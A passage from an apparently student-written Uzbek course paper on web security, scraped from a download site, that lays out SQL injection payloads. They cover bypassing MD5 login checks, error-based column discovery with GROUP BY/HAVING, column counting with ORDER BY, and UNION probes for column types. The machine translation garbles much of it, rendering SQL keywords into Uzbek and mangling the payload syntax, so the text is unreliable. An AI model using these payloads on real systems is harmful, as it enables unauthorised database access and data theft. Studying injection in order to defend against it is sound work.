«veb dasturlar xavfsizligi»


MD5-dan foydalanib, aylanma autentifikatsiya



Download 410,37 Kb.
bet6/14
Sana03.07.2022
Hajmi410,37 Kb.
#737373
1   2   3   4   5   6   7   8   9   ...   14
Bog'liq
kurs ishi1 (1)

11. MD5-dan foydalanib, aylanma autentifikatsiya
Agar dastur avval foydalanuvchi nomini solishtirsa va keyin parolning md5 xeshini taqqoslasa, unda autentifikatsiyani chetlab o'tish uchun sizga qo'shimcha fokuslar kerak bo'ladi. Siz natijalarni ma'lum parol va uning xeshi bilan birlashtira olasiz.
Misol (MSP):
Foydalanuvchi nomi: admin
Parol: 1234 "VA 1 \u003d 0 HAMMA" BOSHQARMA "" admin ","
\u003d MD5 (1234)
12. Xatoga asoslangan
12.1 HAVING BY (S) yordamida ustunlarni aniqlash
Misol:
Xuddi shu tartibda
"1 TAVSIYa - 1 -
"GROUP BY table.columnfromerror1 HAVING 1 \u003d 1 -
"GROUP BY table.columnfromerror1, ustunfromerror2 HAVING 1 \u003d 1 -
"GROUP BY table.columnfromerror1, ustunfromerror2, ustunfromerror3 HAVING 1 \u003d 1 -
…………….
Xatolarni olishni to'xtatmaguncha davom eting.
12.2 ORDER BY (MSO +) yordamida ustunlar sonini aniqlash.
UNION in'ektsiyasidan foydalanib ORDER BY yordamida ustunlar sonini tezlashtirish mumkin.
BUYURTMA 1 -
BUYURTMA 2--
BUYURTMA 3-
………………..
Xatolik haqida xabar olinguncha davom eting. Bu ustunlar sonini ko'rsatadi.
13. Ma'lumot turini aniqlash
Doim ALL bilan UNION dan foydalaning.
Jadvaldagi keraksiz yozuvlardan xalos bo'lish uchun so'rov boshida mavjud bo'lmagan har qanday qiymatdan (agar in'ektsiya WHERE parametrida bo'lsa) foydalaning. Bir vaqtning o'zida faqat bitta qiymatni olish mumkin bo'lsa, bu juda muhimdir.
Satr, sana, raqam va boshqalarni taxmin qilish o'rniga NULL ni UNION in'ektsiyasida ishlating. Ammo, xuddi shunday in'ektsiya bilan ehtiyot bo'ling Siz ma'lumotlar bazasi xatosini dasturning o'zi bilan aralashtirib yuborishingiz mumkin. ASP.NET kabi ba'zi tillar NULL qiymatidan foydalanganda xato qilishadi (chunki ishlab chiquvchilar foydalanuvchi nomi maydonida nol qiymat ko'rishni kutmagan edilar).

Misollar:


"uyushmadan foydalanuvchilar yig'indisini tanlang (ustun)" - (S):
Agar xato haqida xabar kelmasa, unda ustun raqamli hisoblanadi.
SELECT * 1-jadval. Qayerda id \u003d -1 Birlashma HAMMA tanlangan, , NULL, NULL, o'zgartirmoq (rasm, 1), , , NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL. -
Siz CAST () yoki CONVERT () dan foydalanishingiz mumkin.
11223344) BIRINChI TO'G'RISIDA NULL, NULL, NULL, NULL Qaerda 1 \u003d 2 –-
Agar xato bo'lmasa, unda sintaksis to'g'ri, ya'ni. MS SQL Server tomonidan ishlatiladi.
11223344) BIRLASHTIRUV 1, NULL, NULL, NULL Qaerda 1 \u003d 2 –-
Agar xato bo'lmasa, unda birinchi ustun raqamdir.
11223344) BIRLASHTIRUV 1,2, NULL, NULL Qaerda 1 \u003d 2 -
Agar xato bo'lsa, unda ikkinchi ustun raqam emas.
11223344) BIRLASHMA 1, '2', NULL, NULL Qaerda 1 \u003d 2 ––
Agar xato bo'lmasa, unda ikkinchi ustun - bu qator.
……………..

Download 410,37 Kb.

Do'stlaringiz bilan baham:
1   2   3   4   5   6   7   8   9   ...   14



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling
kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha

yuklab olish